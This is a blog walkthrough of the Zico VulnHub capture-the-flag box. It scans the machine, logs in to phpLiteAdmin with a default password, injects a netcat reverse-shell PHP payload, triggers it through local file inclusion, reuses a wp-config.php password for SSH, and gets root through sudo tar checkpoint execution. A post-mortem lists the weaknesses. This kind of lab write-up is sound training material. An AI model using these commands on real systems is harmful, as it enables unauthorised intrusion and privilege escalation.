hackerbrother

Learn Penetration Testing And Ethical Hacking Online.

facebook

  • Facebook
  • Popular Posts

    Zico on VulnHub


    12 March 2017

    Introduction

    My friends and I like to solve CTFs on our own, then teach each other how we solved it. This way, we get experience both teaching and learning, and you always understand material you need to explain to someone else better than if you kept it to yourself.

    Zico’s author rates the box as “intermediate,” but I’d call it “beginner plus.” The ideas needed to root the box are not complicated, but you need to have a bit of prior knowledge to know that you need to implement them.

    Shall we begin?

    1. Initial Scanning

    Since we are dealing with a VulnHub VM, we need to set it up on our HOST ONLY
    network. This box is intentionally vulnerable, why hook it up to your real network?

    Depending on how you’ve set up your host-only network, you may need to use nmap to determine the machine’s IP.

    nmap -sn 192.168.56.0/24
    a1

    Once you’ve found the box, it’s time to give it a real portscan.

    I like to use my benmap script, which runs a few scans and generates

    a working directory for the CTF. You can check it out on Github.


    a2_1





    a2_2











    The nmap -F scan found some potential avenues of attack:
    • SSH on port 22
    • HTTP on port 80
    • rpcbind on port 111

    HTTP is my favorite place to start on CTF’s, so we hit it with the

    triple threat: niktodirsearch and fimap
    nikto -h 192.168.56.101 -o nikto_result.txt

    a3


    Nikto tells us that Apache is a bit obsolete, but nothing else particularly interesting.

    Throw that on our “places to dig” list and let’s use dirsearch.
    dirsearch -u 'http://192.168.56.101' -e php,html,js,txt,sh --simple-report=dirsearch_quick

    a4


    We find a lot of interesting filenames, especially the dbadmin directory.

    Anything with “admin” in the title may be worth a look.

    Finally, we’ll let fimap see if we can dig anywhere we aren’t supposed to be able to.

    fimap -H -d 3 -u "http://192.168.56.101" -w /tmp/fimap_output | tee fimap_result

    a5a

    http://hostname/view.php?page=tools.html smells like file inclusion.

    The use of ?page= may allow us to directly view arbitrary files on the webserver. Instead of using tools.html as an argument, we just insert a file’s full path.
    I tried something like ../../../../etc/passwd, but didn’t find success. Maybe we can use this later.

    Lastly, we peruse the site in the browser.

    a5
    Zico’s Shop?
    Zico doesn’t seem confident that he is in control of his own site.

    Let’s prove that he is right to have doubts and go right for that /dbadmin page.

    a6

    What have we here?

    a7

    2. Doing Dirty Deeds in da Database


    A php database page, with an obvious version number. The title of “testdb” hints at a default setup.

    A default setup may use a default password.password: admin

    a8

    We’re inside.

    Those look like password hashes to me.

    Our friend Hashbuster should have a look at them.

    a9

    Not too shabby! Root and user passwords.

    I don’t think this db is actually used for anything other than testing, but there is a chance that the same passwords are used to login with SSH.
    a10 

    Nope.
    We can see some other useful information on the database page, however.

    For one, we are given the test_user database’s full file path.

    filepath

    This information, combined with the Local File Inclusion vulnerability we spotted earlier means we can access these databases by visiting a URL.

    We can try some tricks using SQL commands, but I wonder if

    these waters have been charted before…

    findsploit phpliteadmin

    a11


    • The very first hit matches our phpLiteAdmin version number.

      If you run searchsploit -x 24044, you’ll see a document explaining how the exploit is operated.

      We’ll break it down, step by step.

      Create a new database with a name ending in “.php”
      a13
    • Select this new database and create a new table with one field. a14
    • Set the field to the “Text” type, and enter a php-command payload as the Default Value.
      I decided to use my most reliable netcat-based reverse-shell.
    • &1|nc local.machine.ip.addr PORTNUM > /tmp/f"); ?>
    a15
    • Create the table, and set up the listener on your local machine.
    nc -lnvp PORTNUM

    a16 
    • Visiting the database in the browser, using our handy-dandy LFI vulnerability will run the payload and pop our shell.
    http://192.168.56.101/view.php?page=../../../../usr/databases/a.php

    a17

    3. From www-data to User

    This shell could use some improvement, so let’s see if we can’t spawn a bash shell with a tty using python.
    which python
    which bash
    python -c 'import pty;pty.spawn("/bin/bash")'
    a18 

    My “advanced” powers of deduction tell me that we are going to have a user named zico. A user with a home directory, even.

    Let’s verify.
    ls -la /home
    ls -la /home/zico 
    a19
    Luckily for us, Zico doesn’t seem to mind if we read files in his home directory.
    Talk about courteous!
    Zico seems to have even left a note behind for himself.
    Surely he won’t mind if we read that, too.
    cd /home/zico
    cat to_do.txt 
    a20 

    Zico seems to be trying out some content management systems for a new website.

    The site we got through in order to get this shell used phpliteadmin, so Wordpress must be next.

    We see Wordpress sites all the time in CTFs, and know it well enough to know where to look for the squishy bits.
    cd wordpress
    ls -l
    a21

    Zico hasn’t implemented this site yet, so it may not have been combed through for sensitive info.
    wp-config.php can often contain passwords.
    grep -i 'pass' wp-config.php

    a22 

    A database password, nice.

    Let’s try it with SSH, because, why not?

    a23

    4. From Zico to Root

    As the presumed owner of this box, Zico should be able to get some significant things done.
    sudo -l
    a24
    tar and zip are a bit strange to see as sudo-enabled commands. Can they be used for code execution?
    I searched online, and found some very interesting information at these two sites.

    tar can be run with flags that cause it to unarchive with “checkpoints.”

    At these points, the process will pause and take an action, then seamlessly resume.

    Since we can run tar as root, we just need to use these checkpoints to run some commands that escalate our privileges.


    Running Tar As Root For Fun and Profit

    Move to a “temporary” folder like /dev/shm and create a file that we will compress.
    Compress it with tar as Zico. No need to run as root just yet.


    a25 

    Unarchive the newly created .tar, making sure to use sudo and including the flags to add a checkpoint and commands.

    The commands will run along with the .tar command, so any output from the commands will appear in the terminal

    Our test payload is the (redundant) command echo $(id), which will output the info belonging to the user who ran the tar command to the terminal.

    If things go according to plan, we should see root’s info.

    sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)'

    a26

    Our privesc concept is proven.

    We can just run /bin/bash as our checkpoint commands to spawn a root shell.
    sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'

    a27
    And, we’re root.

    Go to the /root directory and grab the flag.
    cd /root
    ls
    cat flag.txt

    a28 

    Post-Mortem

    This CTF was made purposefully made porous, but these vulnerabilities can be found in the real world.

    Here’s what made Zico rootable.
    Use of Default/Obvious Credentials
    • In this scenario, Zico’s phpLiteAdmin database was just for testing purposes. However, adminis simply not a password that should be in use. It’s just too easy to guess.
    • Had we not been able to gain access to the phpLiteAdmin panel, we may not have gotten any access at all.
    Local File Inclusion
    • Serving webpages with ?page= is a recipe for local file inclusion.
    • Only one page was intended to reached this way, and it wasn’t even the only link to this page on the site.
    Outdated Versions of 3rd Party Software
    • The phpLiteAdmin version used here isn’t even available for download from the phpLiteAdmin website.
    • The code injection vulnerability we used to run our php payload was patched away in later versions.
    Credential Reuse
    • The password by www-data in the wp-config.php file to access the website database was the same as the user’s password.
    Least Privilege Violations
    • www-data had unneccessary read access to zico’s home folder.
    • If zico isn’t a superuser, I’m not sure what reason they would need to have to run tar and zip as root.

    Thanks for reading!

    0 Comments